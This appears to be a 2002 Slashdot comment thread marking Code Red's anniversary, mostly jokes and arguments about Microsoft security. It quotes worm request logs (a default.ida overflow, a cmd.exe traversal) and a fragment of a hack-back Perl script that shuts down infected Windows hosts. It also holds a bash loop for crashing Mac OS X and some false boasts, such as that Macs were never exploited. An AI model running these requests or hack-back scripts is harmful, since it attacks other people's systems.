When did Code Red hit? Did I bother to notice? Did I bother to record? No. It didn't affect me much.
how is this deserving of +5 funny? This same joke is said in about 90% of slashdot stories.
Instead of wasting your mod points blasting my post into oblivion like i'm sure you are just itching to do, why not mod the parent to (-1 redundent) and preserve what little respectability is left on slashdot.
On my dial-up account I still get a average of 40 hits a day. So this consumes a greater percent of my overall bandwith, which keep me from downloading 40% more pr0n.
Is it slashdotted or is that the demonstration?
;)
Server is still infected with a IIS virus (though not Code Red). Here it is
I sent them an email - almost a year ago in fact. They just brushed me off and gave a rather pathetic excuse ("the box is too slow to run Norton").
You can read the e-mail here.
Of course, these are the same people who run a trouble ticket server on the district wide WAN that any old joe at school can access and see where the security issues are.
This is the sysadm's sick joke to get back at us for slashdotting his site. Don't click on it.
Don't you get it?
"Happy Birthday Code Red, Happy Birthday Code Red, Bill sucks with his coding, Happy Birthday Code Red."
Now blow out the flaming servers, and make a wish.
Insert something insightful here, or I'll insert something painful there.
Back when code red started causing havoc to IIS web servers, a group came out with a nice perl script that would shut down IIS, as well as the OS. Since IIS was wide open at this point, it would send ..
s re set+/stope xe?/c+rundl l32.exe+shell32.dll,SHExitWindowsEx+5
http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+ii
http://$ENV{REMOTE_ADDR}/scripts/root.
No mac web os9 or older servers EVER exploited in history despite several different large challlenges with 10,000 dollar prizes.
Bugtraq shoes no exploits of a mac server running a non unix OS and only WebStar webserver, or other webservers.
One time a combinations of two crappy third party tools created a minor exploit but no exploits exist in mac servers... NONE.
Is that not interesting?
The reasons are technical and have a lot to do with archetecture (stack return address, c string usage, no command line, special dual fork executables, lack of file extensions under user control, etc)
nobody likes to hear the truth, but the usarmy had enough of bsd abd linux and nt and used macs for some of its servers to prevent embarrassment.
No one ever notes that the CRW absolutely rape cisco dsl routers.
At its peak, Qwest had a 5 hour hold time for people who's cisco was taken down by the vuln.
Incidently, the fix was killed more routers.
forget it.
No one has ever hacked my super l33t webserver that runs on my Commodore 64!
Therefore, my webserver is superior than all others.
Corporate America mostly runs Windows 2000. That's the system that needs security and reliability most. And where's Microsoft?
Every time I read about something like this I imagine Nelson Muntz sneering, in his inimitable voice, "HAH ha!"
...going to get it? Set up a fucking mirror before you post the links!!
What assholes. They spend hours upon hours with fucked up things like lameness filters and limited comments (which don't work, btw, there's just as much Trolling and crap-flooding as ever), and can't spend 10 seconds to mirror the files on their own servers so they don't suck down unsuspecting sites' bandwidth.
I wish I could keep from coming here because I hate giving them the hits, the fucking lusers. I just can't seem to keep away, though. Guess I'm a luser, too. How sad..........
/.: why the hell am I here?
I guess the Government is going to fix what lazy naive sysadmins won't?
That's the first time I've seen someone getting smashed by the /. effect, and coming back asking for more!
"They do not preach that their god will rouse them, a little before the Nuts work loose." Kipling, 'The Sons of Martha'
[sarcasm]
Thank god we have IDS packages like ISS in place to keep systems safe.
[/sarcasm]
Is there a apache log analyser that shows nifty graphs of all the different kinds of attacks somewhere out there?
:)
That'd be cool
It says right on the image, caiga.org son ewframes-small-log.gif
http://www.jump.org.uk/caida_code_red_animations/
go there...
Of course, that is a 4.1 MB GIF file.
In Soviet Russia...michael would be rotting in Siberia!
Most people on /. probably wouldn't be affected, but it might have been a good idea to note that accessing that URL could actually INFECT your PC.
http://online.securityfocus.com/cgi-bin/sfonline/v ulns.pl?vendor=Apple
I do remember the crazy traffic generated by the problem. But that is a Weird graphic.
However, I am glad that it is a gif instead of a jpeg,because otherwise it might have contained a virus
- Life is what keeps you occupied while you are waiting to die
They will have a field day with it!
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
No, not with my tax dollars. Microsoft fucks up, microsoft pays; not me or the "public". If it's about public interest then hold microsoft responsible and let them make the fix or make them hire a 3rd party to do so. However using my tax dollars to fix an inept companies fuckup is not whats gonna happen.
What pisses me off is that when an early exploit was detected awhile back (err, many years), somebody released worm to go around and fix it but THEY where the ones who got in trouble with the FBI, thus setting a precident in the future saying that the computer community was not allowed to take all neccisary steps to fix problems that may pop up.
Kind of killed off community effort right there. >;(
Need help treating your acne? Come here!
Someone will let them know... hehehe.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
Who links to a 4 meg animated gif in a ./ article?
Oh thats right
TIMMY!
Funny, I knew it was him without even looking.
Why not write a program that watches for incoming Code Red/Nimda probes, turns around and roots the offending box, and takes it down leaving a message for the Sys Admin to straighten up his act?
Presumably the original hole could be used to root the box, but any of the umpteen security holes that followed could probably be used as well. Since they haven't patch for Code Red, they haven't patched for anything else either!
Sigh... It might not be legal, but it would be funny.
I could stick a cardboard box in my living room and claim that it's never been cracked...
Sure, no one has cracked a macintosh, but does a Mac really do anything anyway?
Is that not interesting?
Not really. The stability sucked. Who cares if there was never an exploit if it can't handle a reasonable load?
Ask youself why Apple never used OS 8 or 9 for their website. Because it sucked that's why! Before OS X they used AIX.
I'm actually in Missouri.
I sent it to TV instead: click2houston.com
I bcc'd you on the email.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
Kid, it's spelled "the." /end spelling nazi comment
Learn how to use it.
It doesn't mean much now, it's built for the future.
Good SysAdmin got to sleep a year ago because they were up on their IIS patches. Bad SysAdmins aren't exclusive to Windows, they work on all platforms regretfully.
We're having a party on Friday September the 13th brought to you by the Bassline Terrorists featuring the 4 Horsemen of the Apocalypse. The flyer is two bassbins burning... not to disrespect the people who died in a pretty bad incident, but for christs sake... move on.
.au we are SO FUCKING SICK of hearing about this shit. Get over it - you can't move on if you dwell in the past.
down here in my little corner of the
Does that mean, therefore, that anyone running Linux without the fix for the 1i0n (or however that's spelled) exploit, can sue Linus Torvald, Redhat, et al for damages? How about anyone running a Micro$oft OS that has an exploit taken advantage of with a worm, virus, etc, that was created on a Linux system with the sole purpose of damaging as many M$ OSs as possible?
If you get shot by someone and suffer horrendous injuries, do you sue every bullet proof vest manufacturer, or gun manufacturer because they didn't base their business model around you? Or do you sue (or at least lock up) the one who pointed the gun at you and pull the trigger? Do you go around your neighborhood, testing each doorknob to see if the house is locked, then rob and burn down each house that isn't? Is it the homeowner's fault for not locking the door, or you for entering in the first place?
If you want to hold anyone responsible, try the guy/s who code viruses and worms... Anyone with sufficient pathological incentive to wreak havoc and trash a computer system (or, basically, anything else) will do so...
Responsibility goes two ways, on one hand, those who have known for a substantial period of time that there was a problem that needed addressing, and those who take advantage of that problem... The net makes this all more obvious, at least to those of us with a smidgen of common sense...
Just because you can mod me down, doesn't mean you're right. Shoes for industry!
You are talking apples and oranges. My gov't will not distribute cd's with a fix for Microsoft software. If it's in public interest my gov't will tell Microsoft it must distribute cd's with a fix for Microsoft software. Thats the way it will work, everything else you seapk of isn't relevant to this argument at all.
...why don't we realease a Code Blue? It can be a benevolent worn ( an oxymoron, I know ) which goes around to all the nice little *nix and BSD boxes all over the world, enter their systems, fix every known security exploit, then delete itself. No wouldn't that be a wonderful idea? ( *lay on the thick sarcaasm* =] )
And so we go, on with our lives
We know the truth, but prefer lies
Lies are simple, simple is bliss
Is this a precedent? Will we always mark the anniversary of *all* worms/viruses, or only those that affect Microsoft products? Or will we mark those exploits that affect lamer sysadmins that don't know enough to patch their own servers? How about all those Apache admins haven't upped to 1.3.26 and 2.0.39 yet?
/.-ed?
Yeah, wait, don't rush to mod me yet.... I know... the Apache exploits don't fill your precious logs with bogus requests....
Is this the requirement for a worm to be
-MW
Yeah, but who the fuck wants to write a worm to exploit .5% of webservers?
Please.... get overyourself... the kiddes shoot for the bellcurve, not an outdated and inadequate OS.
This was not an exhaustive search, nor a statistically significant sample group, and dynamic IP allocation muddled the results a bit, but it was enough to make me wonder. How many of the 'code red attacks' these days are really script kitties with unix boxes? My guess is they account for most of them.
Has anyone looked into this for more than the 15-20 minutes I put into it?
Build stuff. Stuff that walks, stuff that rolls, whatever.
I guess I should consider myself lucky.
Total/Unique
Nimda hits: 6213/134
CodeRed hits: 76/76
Damn annoying, though.
-- Will program for bandwidth
Well it's really like the Lamer Exterminator, if you got it, directly or indirectly, you probably deserved it... :o)
Xix.
"Everything is adjustable, provided you have the right tools"
This... is my bro.
CRAZY EARL the sysadmin lifts a dustcover to reveal a toasted server
This is his party. He's the guest of honor. Today... is his birthday.
Email Mother calls out from down the hall: "Happy Birthday, Code Red."
I will never forget this day. The day I came to IIS city and fought one million Code Red worms. I love the little Commie bastards, I really do. These enemy worms are as persistent as thick-headed CIOs.
These are great days we're living, bros! We are jolly caffeinated giants walking the earth, with Bawlz. These worms we wasted here today, contain the finest code we will ever see. After we start working with real servers again we're gonna miss not having any worms around worth killing!
(obligatory reference for those who've never seen Full Metal Jacket)
my web log shows an average of forty-two requests per day
That is indeed interesting, a short time ago when discussing Windows security in a danish newsgroup, I counted the entries in my log. I also had an average of forty-two requests per day.
This couldn't be a coincidence, could it?
Do you care about the security of your wireless mouse?
Try putting these handy tags around the deadline, and all will be revealed.
<sarcasm> </sarcasm>
Does that help?
The user chooses the software =)
Viva Unix! =)
We jokingly discussed an Evil Plan where I worked when CodeRed first came out.
One thing we discussed doing was getting a copy, disassembling it, and building a version that would install FreeBSD with Apache with Front Page Extensions and the Active Server Pages module over top of the Windows installation, with all of the web site content left more or less intact.
We figured that it would be pretty cool if we could make it so that people would not notice that their server had been "competitively upgraded" until the next scheduled reboot/update.
We thought that it would be even more likely to go a long time if we captured the console screen of the running server, and used it as the boot "splash screen" for the replacement OS...
Of course, as I said, doing this would be Evil, so we only discussed the possibility.
-- Terry
I also get this one on my Apache/Linux server more than Code Red requests:
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+ dir" 404
"GET
If you get shot by someone and suffer horrendous injuries, do you sue every bullet proof vest manufacturer, or gun manufacturer because they didn't base their business model around you?
Believe it or not, a lot of people are trying just that, and frightenly having a fair amount of success.
The problem in the case of Code Red, and the worm of the week wreaking havoc with Microsoft products, is one of false representation, and perhaps outright fraud.
People keep getting told from Microsoft "Our servers are stable and secure, you don't need to don't need to worry." Then something happens, and Microsoft does nothing until someone has demonstrated in an amazingly public way that their stuff in indeed vunerable.
Once that happens they issue a fix. The fix usually seems to be some method of messing up the specific method used, so minor changes to the worm make it work again.
The Open Source world on the other hand is very quick to fix any bugs they know about and can that can be fixed. More than once some of the security groups were frustrated when Red Hat or some other Linux distro maker, after being informed of a problem, releasing not only the details but a fix long before they were ready.
Microsoft has actively tried to keep anyone from finding out through any legal means about any security problems with their products. The Linux community works hard to find and fix problems.
Microsoft products are a little like the Ford Pinto of the software world. The Pinto would blow up rather spectacularly if rear ended. Ford was sued and had to fix the problem.
Had Ford voulantarily recalled the Pinto earlier (and the evidence suggested that they knew of the problem before the first Pinto was ever sold), there would have been no casue to sue them. However they tried to cover up the problem, and repeatedly denied the existence of any problem.
Microsoft knows there are vast security holes in their products. They prefer to put them out and hope no one notices. When someone does notice, they deny there is a problem, and have pushed to get anyone who tries to find such problems arrested. They are, in effect, enganged in a cover up. This is what opens them up to being sued. There is rarely a good faith effort to fix any security hole before it becomes a problem.
Contrast that with the Linux world. There are occasionaly penetrations, but there is always an effort to find and fix such problems long before such things happen.
The other problem was that IIS and WPS are often installed and running without the person even knowing it. In fairness, most linux distros seem to install and set up Apache without permission too, but at least Apache has been pretty much immune to worms for the last few years. Should you hold everyone who installed win2k on a networked machine responsible because they failed to install security patches on a server they didn't even know they were running?
Microsoft acts very irresponsibly with their software, and there should be some accountability. I wouldn't sue them just over Code Red, but take the worm of the week hitting IIS, and the worm of the week hitting Outhouse, and Microsoft's complete indifference to fixing either, and we get a pattern of indifference which is prosecutable.
There is a civil war coming in the United States. Remember which side has most of the guns
Don't worry, I'm sure there must be guys at Microsoft working round the clock on Linux worms and virii...
Are you sure?
Which virus do they have?
I wouldn't worry about the FBI, etc.
It's not like it's a unique infection that no one has ever seen before.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
For people outside USA: Mountain Dew is Pepsi's wildly popular (especially among programmers) pop brand. The new cherry flavor is called Code Red. Does anyone really know whether the pop got its name from the worm?
q .h tml:
http://www.mountaindew.com/code_red/code_red_fa
> Why did Mountain Dew choose the name Code Red?
> Our consumers named Code Red. Consumers thought
> Code Red best captured the spirit of the new
> brand.
shut up!!! That is a myth and you know it!
/Local/Library/WebServer/CGI-Executables/test-cgi ./CGI-McPanic
#!/bin/bash
#
# CGI-McPanic: script to crash MacOS X with
# concurrent calls to a CGI-Script
#
# before use, do:
#
# chmod a+x
#
# then call
#
# bash
#
NUMPROC=32
i=0
while [ $i -le $NUMPROC ]
do
i=$[$i + 1]
ab -t 3600 http://localhost/cgi-bin/test-cgi &
done
ATTENTION: anyone have a copy of the slashdotted page? If so- email me the info and I will mirror it on a cluster of servers that can handle the /.'ed ness.
gshively@pivx.com
I share a birthday with an IIS worm! Seriously!
Do I get a cookie?
So Code Red is now part of the background noise of the Internet along with all the spams, klez mails, and other generally viral nuisances.
:-)
I wonder if this is the way it goes, kind of like low earth orbit aquiring space junk, or the universe gradually dying in entropy soup? We will just keep on accumulating noise due to things like this that never go away, until one day they are using nearly all the bandwidth of the Internet and the thing will be unusable. Just goes to show how bad monocultures are.
Then again, that might be like the prediction about Lonodn dissapearing under horse manure sometime in the 1930's.
[Reboot server in safe mode...]
"What in the Sam hell..."
Vaya con huevos, my darling.
Exactly. Even OpenBSD (Arguably the most secure by default installation OS, ever.) doesn't make stupid claims like that.
:P
Plus, the only reason you never hear about Mac web servers being smacked around is.. Who the hell uses a Mac for a webserver?
jeez, grow a cock
According to this article in InfoWorld, Linux cracks are getting just as bad as IIS stuff.
However, it doesn't mention any particular crack or even web server - it's pretty light on details really. Looks like FUD to me.
KangarooBox - We make IT simple!
... but testboxes or homeusers with an IIS installation on their win2k pro or win2k server OS they used. This is noticable by the fact that most attacks were and are originating from cable-internet connected boxes.
Most IIS admins who are responsible for webservers who run company websites did patch IIS long before the worm started or better: did like MS told them to do: disable all extensions not used on the box, like htr and ida. (Oh, and removed the examples)
Ok, some company-used webservers were exploited, but this number is not a majority by far.
Never underestimate the relief of true separation of Religion and State.
Hotfixes don't kill webapps. I develop webapplications (the n-tier stuff, VC++/VB/ASP/IIS/SQLServer etc) for over 5 years now and have applied a zillion or so hotfixes on IIS and NT / Win2k server to keep the systems up to date, but never ever have I encountered 1 single hotfix which killed a webapplication nor did I hear from collegues that hotfixes killed their webapplications. If the webapp is written solidly, by the guidelines MS has supplied, you can apply any hotfix, period.
When your developers are not that educated however, perhaps they use dirty tricks which will break when a hotfix is applied (allthough I doubt it, hotfixes mostly overwrite existing files without updating CLS_ID's etc, because these stay the same) and the app will die after the hotfix is applied: one reason to kick them out the door for some real professionals.
Never underestimate the relief of true separation of Religion and State.
Here's a mirror of the image.
http://razor.hemmet.chalmers.se/CodeRedSpreading.g if
Were do people get these dates from? At least do a little research. The first reference to CodeRed I could find was a post to the Incidents list at SecuirtyFocus.com on July 15th. The acutual data was captured a couple of days prior to the post if my memory serves me correctly (the poster is a good friend of mine and a coworker at the time).
www.sguil.net
The Analyst Console for NSM
Recommended gifts from admirers:
1) DIVX's of Hackers or The Net.
2) Natalie Portman... Enough said.
3) Port me to more platforms.
and finally.... a 2nd chance.
--
CodeRed, the lower user #. No relation to SirCam.
Why would you glorify this virus by even acknowledging it's anniversary?!!
"Herbivores eat well cause their food never, ever runs."
You should have seen it last year, one day we were receiving so many requests for non-existant files that out server was crawling, because our not found page was generated by some scripts. I simply wrote a Perl handler to handle it(roughly 60 secs) and that took care of it.
Quite humorous it was. And that we still get thousands of hits from infected machines is hilarious.
Heh, Internet worms... fun stuff.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
Comment removed based on user account deletion
Comment removed based on user account deletion
Oracle is the scumbag company that has offered this to the Feds for free.
What about that worm who nibbled away many millions of dollars from Elingson Oil's computer mainframe a couple of years back. They've never fixed that exploit.. I mean hell it was used before by those guys that Superman had to fight off. Then later after the Elingson Oil bit.. those guys at that big software firm Initek did it too.. then again that building burnt down so we can't prove it. WHERE's THE PATCH FOR THAT WORM!!!
Who makes you Sig?
One year later and still burning strong.
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329 "-" "-"
212.175.39.77 - - [19/Jul/2002:08:01:49 -0500] "GET
Morons.
...would seem to be the norm down there. I remember a couple years back, I was tracking down a luser on IRC who was bouncing off open proxies all over the world. One of them was that machine, IIRC. I sent e-mail (futile, I know) to various SAs telling them what the problem was. The only reply I got back, besides the automated responses, was from someone at that domain. He proceeded to bitch me out, accusing me of spreading FUD -- because of something HIS machine allowed. But he did claim to have plugged the hole afterwards. :P
on.
I think calling it "cherry-flavored" is too generous. "Red-flavored" is much more to the point.
Such a worm is already out. Or don't you keep up with network security?
The problem, of course, is that it isn't making much headway right now.
Believe it or not, out of all the people in in the world running MS Outlook, fewer than 1% have ever pulled down security patches, see The Great MS Patch Nobody Uses.
Additionally, the Win2K/NT server guys are afraid to install security patches since they never are really how much of their server is going to break. Often times, Admins will patch the servers which touch the Internet but not the Internal servers for fear of breaking them. With Code Red, this was quite humorous because the outer servers were patched as soon as the Code Red patch was available, thinking this action would defend the realm against Code Red, but they forgot about the laptop users which brought Code Red in the back door via the local LAN.
But not to worry folks, once we get Palladium hardware in all our servers, this will not happen again right? In fact we won't even have to patch anymore, since everything will be secure and, only secure applications will be allowed to run.
Oh, wait, wouldn't IIS pass the palladium trusted application test?
Why yes it would...... and Code Red would join the list of "Trusted Secure Applications".!
Sorry, I have to smack Palladium everytime I get a chance.
It'd be nice if you read the title of your parent post before commenting. Here's a hint: No mac web os9 or older servers EVER exploited and another hint, this from your own post: # CGI-McPanic: script to crash MacOS X hmm.
...and it was quite a bit of fun riding skateboards around the corporate HQ at 2:30am in the morning...
As opposed to 2:30am in the afternoon?
Hey kids, there's only 5 days left 'til Yak Shaving Day!
Smallpox killed 300 million people in the 20th century, but a coordinated effort lead by the WHO effectively erradicated it.
Who will lead the effort to erradicate CODE RED?
Since it allows random code to be run on infected servers, it is technically trivial to stop it.
Who will lead the counterattack?
Just wipe out IIS and reboot should do it.
RL
That is all I hear.. How about everyone stfu? If u hate Microsoft so much don't freakin use it? Go create your own product and stop ur whinning!!
I know this. But a lot of government "security" is handled through microsoft products.
And if we ever did have a mark of the beast... er, Homeland Security ID, you can bet MS products would be running a lot of the system.
I was just trying to make a point in a somewhat quippy manner.
In Capitalist America, bank robs you!
From my memory I remember this is the straw that broke the camels back for many of the people and companies that I knew who had been running IIS in some form or another. We had always been a Unix shop -- but many of the 3rd party "server" products had been written using ISAPI -- and required IIS and or Windows to function...The companies that produced these products were flying high and raising the Microsoft sword of ignorance. This virus sent them all back into their holes. Some of them went back to the drawing board to port their products to a real OS and Web Server....The others are dead or close to death.
(+1 Funny) only if I laugh out loud.
Only thing I wish would have been done with this article, is that there should have been a link to removal tools for NT/2k. Remember, most Microsoft server "admins" (I use that term loosely) don't know what they're dealing with. Also, I know that the MS patch to fix that problem didn't work. For about 8 months I installed the patch to remove/repair my ONLY NT server about twice a week. It would stop the process and remove it, but the virus would just come back. The logs on my linux servers are what I went by to tell when my NT box had it....again. Anti-virus software doesn't even catch it half the time.
All I'm really saying is there should have been some information about removing it and so forth in the article. If we're gonna gripe about people not maintaining their servers, it behooves us to help them figure out how to do so.
In other news, an Anonymous Coward reports "There have been no reported incidents of any Commodore 64 webservers ever having been compromised! Oh, and my Honda Accord hasn't been compromised either..."
And if we ever did have a mark of the beast... er, Homeland Security ID, you can bet MS products would be running a lot of the system.
It might not be Microsoft. It might be Oracle. Why doesn't that make me feel any better?
Given one hour to live, the student replied: "I'd spend it with professor FP who can make an hour seem like a lifetime."
Folks, this is a PERFECT example of unintended consequences.
Any more questions on why people say computer law is jacked up?
OMG! Now the CATS are learning to program! How am I every going to compete with programmers that get paid in Meow mix?!
This isn't so much about the anniversary of an aggressive virus so much as it is a reminder that people remain impressionable, gullible and downright cluelness about the technology they use on a daily basis.
The same people with computers that end up ravaged by silly viruses attached to e-mail messages with subjects resembling "Virus Removal Tool" are the same people that wonder why they can't address e-mail to "www.yahoo.com" and so ask me to explain the difference between a web and e-mail address to them. Oh yeah, did I mention I do tech support for an ISP?
Worse yet, it's remarkable how people end up being repeatedly suckered by half-baked, ill-worded schemes to get you to open their 'refund.txt.bat' files.
The real weakest link here are the people -- after all, it's people that are responsible for creating and propagating viruses, but a close second for that ultimate prize goes to the method to all this madness: Microsoft Windows and its rotten offspring, Outlook Express. With ease of use comes ease of being deceived, which is all attributed to the same people who believe computers are toys -- the ignorant ones. That isn't to say everybody that uses Windows and Outlook Express are ignorant; I use Windows on a daily basis, never Outlook Express though. I set that aside in favour of no-frills e-mail through a sell account. There are an overrepresentation of stupid folks using Windows.
So with that reasoning, I suppose it would be more appropriate to wish the stupid folks a happy birthday.
- IP
here,
here,
and here.
I have since then been saving each nimda hit in a separate log and recently compiled a list of *ALL* unique nimda queries made to my web server which I use with home-grown cgi/shell scripts to make a series of requests back to the attackers ip addresses as they hit me, which attempt to place warning text files in various places on their system and pop alert messages.
So I also recently posted a follow-up article on nimda which points you to all the queries i have catalogged so far.
Note: if you *really* want some of the shell scripts i use to attempt to warn the attackers just request so in comments to my journal, tho they really are nasty hacks. I just may write a java app triggered by a servlet or cgi one of these days.
Extraordinary Vacations. Exceptional Prices
iptables -t filter -A INPUT -i ${INET_IFACE} -p tcp --dport http -j WEBVIRUS
The default entry in WEBVIRUS chain would be to jump to the INETIN chain (or ACCEPT if that is what you want) if no matches were found:
iptables -t filter -A WEBVIRUS -j INETIN
Then, if there was some way to have Apache call 'iptables' each time it detected a "virus" hit (this is the part I haven't figure out yet...)
iptables -t filter -I WEBVIRUS -i ${INET_IFACE} -s ${host} -j LOGNDROP
which would insert the offending IP as the first entry in the WEBVIRUS chain. (LOGNDROP is just a rate-limited logging chain). Now the infected machine is effectively black-holed, preventing any further requests from even reaching Apache or the log files.
The tricky part is getting something like the following to work in Apache so it can call 'iptables' to add the offending IP:
RewriteRule ^(/(scripts|msadc|MSADC|./winnt)|.*(default\.ida|[ NX]{30}|c\+dir)) /cgi-bin/webvirus.pl [L,T=a
pplication/x-httpd-cgi]
Anybody have any ideas or seen any solutions that have integrated web-virus detection with iptables filtering?
This script will run "route delete 0.0.0.0" when someone infected with Code Red tries to infect your machine
click for scripty
I have been using this for six months with much success.
http://www.caida.org/analysis/security/code-red/co deredv2_analysis.xml#animations
e wframes-small-log.mov
and the mov version.
http://www.caida.org/analysis/security/code-red/n
Why should Slashdot publicly celebrate the "accomplishment" of a few childish crackers?
There are plenty of hard working people out there.
Please stop giving undue credit to useless idiots who waste our oxygen supplies.
The biggest reason (IHMO) why Code Red spread so rampantly was not because:
;-)
- Microsoft writes lousy code (they're not great, but I don't believe they suck more than other httpd authors)
- Windows security is dreadful (Win95/98 is fairly bad, but I don't think NT is *that* horrific)
- The large installed base (Apache has kind of a big base)
- Microsoft has bad kharma
I believe the real reason is the *homogeneity* of IIS and the Win32 platform. Virus and worm authors have a predictable environment for which to code. Biologists would refer to this as a monoculture. Monocultures are notoriously prone to being taken down -- witness the Irish potato famine.
Apache runs on far too many disparate platforms for a single exploit to "catch fire".
That's why I like an internet with many different OSes, machine architectures, http servers, etc. A diverse ecosystem is good for all!
Apache
...that I share a birthday with Code Red? :-)
Don't these virus authors do it for the fame and attention? Why feed an ego with an "anniversary story"?
Why make it difficult? Make a script in your favourite language; shell, perl, whatever, and name it 'default.ida' or 'root.exe' and plant it properly. The script, when called by Apache as a CGI, will have the IP address as an env variable. Use that to update your filter of choice appropriately.
Vintage computer games and RPG books available. Email me if you're interested.
Comment removed based on user account deletion